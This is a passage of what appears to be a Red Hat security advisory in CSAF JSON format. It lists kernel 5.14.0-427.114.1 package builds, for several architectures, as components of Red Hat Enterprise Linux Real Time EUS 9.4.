"name": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.src as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.src",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
